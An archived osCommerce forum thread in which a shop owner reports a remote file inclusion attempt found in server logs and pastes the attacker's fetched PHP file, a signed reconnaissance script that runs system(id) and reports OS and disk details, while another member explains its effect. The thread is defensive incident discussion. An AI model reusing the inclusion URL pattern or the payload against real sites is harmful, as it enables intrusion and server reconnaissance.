Jump to content

Archived

This topic is now archived and is closed to further replies.

GothicBeast

Is this a new hack attempt? "errors.php?error=http"

Recommended Posts

Hi,

 

First, I did go though and search for any information on this string but could not find anything on the web or on the OSC support forum.

- If this is a duplicate info, I am sorry for my poor searching.

 

Anyway on to the info...Today looking though my logs I found an interesting string.

 

- http://xxxxxxxxxxxxxxxxx/xxxxxxxx/index.php?cPath=27//errors.php?error=http://r20.XXXXXXXXXXXXXXXXX.com.br/web/XXXXXXXXXXXXXXX/XXXXXXXXXX.txt???

 

I don't have a errors.php file and I pulled the ".txt" file that it was calling. That file looks to be some php code.

- The code also has a signature at the end. I figured the signature is related to the author and that this may be a file from a hacking tool kit.

 

Anyway, I searched for the code though the website and did not find any of the code or modified files on my end.

Share this post


Link to post
Share on other sites

Looks like the forum reduced the http string.

 

//xxxxxxxxxxxxxxxxx/xxxxxxxx/index.php?cPath=27//errors.php?error=http://r20.XXXXXXXXXXXXXXXXX.com.br/web/XXXXXXXXXXXXXXX/XXXXXXXXXX.txt???

 

The key part is the use of an errors.php and a call string to a text file though the web

Share this post


Link to post
Share on other sites

They will probably be trying to get the contents of xxxxx.txt to run as PHP within the error.php code. What is the contents by the way (of that txt file).


- Stop Oscommerce hacks dead in their tracks with osC_Sec (see discussion here)
- Another discussion about infected files ::here::
- A discussion on file permissions ::here::
- Site hacked? Should you upgrade or not, some thoughts ::here::
- Fix the admin login bypass exploit here
- Pareto Security: New security addon I am developing, a remake of osC_Sec in PHP 5 with a number of fixes
- BTC:1LHiMXedmtyq4wcYLedk9i9gkk8A8Hk7qX

Share this post


Link to post
Share on other sites

They will probably be trying to get the contents of xxxxx.txt to run as PHP within the error.php code. What is the contents by the way (of that txt file).

 

<?php

 

function ConvertBytes($number) {

 

$len = strlen($number);

 

if($len < 4) {

 

return sprintf("%d b", $number); }

 

if($len >= 4 && $len <=6) {

 

return sprintf("%0.2f Kb", $number/1024); }

 

if($len >= 7 && $len <=9) {

 

return sprintf("%0.2f Mb", $number/1024/1024); }

 

return sprintf("%0.2f Gb", $number/1024/1024/1024); }

 

 

 

echo "DuXCr3w<br>";

 

$un = @php_uname();

 

$id1 = system(id);

 

$pwd1 = @getcwd();

 

$free1= diskfreespace($pwd1);

 

$free = ConvertBytes(diskfreespace($pwd1));

 

if (!$free) {$free = 0;}

 

$all1= disk_total_space($pwd1);

 

$all = ConvertBytes(disk_total_space($pwd1));

 

if (!$all) {$all = 0;}

 

$used = ConvertBytes($all1-$free1);

 

$os = @PHP_OS;

 

 

 

echo "DuXCr3w was here ..<br>";

 

echo "uname -a: $un<br>";

 

echo "os: $os<br>";

 

echo "id: $id1<br>";

 

echo "free: $free<br>";

 

echo "used: $used<br>";

 

echo "total: $all<br>";

 

exit;

 

--------------------------------------------------->DuXCr3w<----------------------------------------------------------------

 

re_nero H4ck3D MaGoNeRo

Share this post


Link to post
Share on other sites

If they were able to trigger that function above then the most they would have got from that would have been the username of the admin of the operating system and how much free space there is on that webserver. That code would not overwrite any files.

 

Can you pm me the actual URL to that txt file link, I want to test it on my test site to see what if anything it would produce.


- Stop Oscommerce hacks dead in their tracks with osC_Sec (see discussion here)
- Another discussion about infected files ::here::
- A discussion on file permissions ::here::
- Site hacked? Should you upgrade or not, some thoughts ::here::
- Fix the admin login bypass exploit here
- Pareto Security: New security addon I am developing, a remake of osC_Sec in PHP 5 with a number of fixes
- BTC:1LHiMXedmtyq4wcYLedk9i9gkk8A8Hk7qX

Share this post


Link to post
Share on other sites
Can you pm me the actual URL to that txt file link, I want to test it on my test site to see what if anything it would produce.

Done

Share this post


Link to post
Share on other sites

Thanks for that.


- Stop Oscommerce hacks dead in their tracks with osC_Sec (see discussion here)
- Another discussion about infected files ::here::
- A discussion on file permissions ::here::
- Site hacked? Should you upgrade or not, some thoughts ::here::
- Fix the admin login bypass exploit here
- Pareto Security: New security addon I am developing, a remake of osC_Sec in PHP 5 with a number of fixes
- BTC:1LHiMXedmtyq4wcYLedk9i9gkk8A8Hk7qX

Share this post


Link to post
Share on other sites

×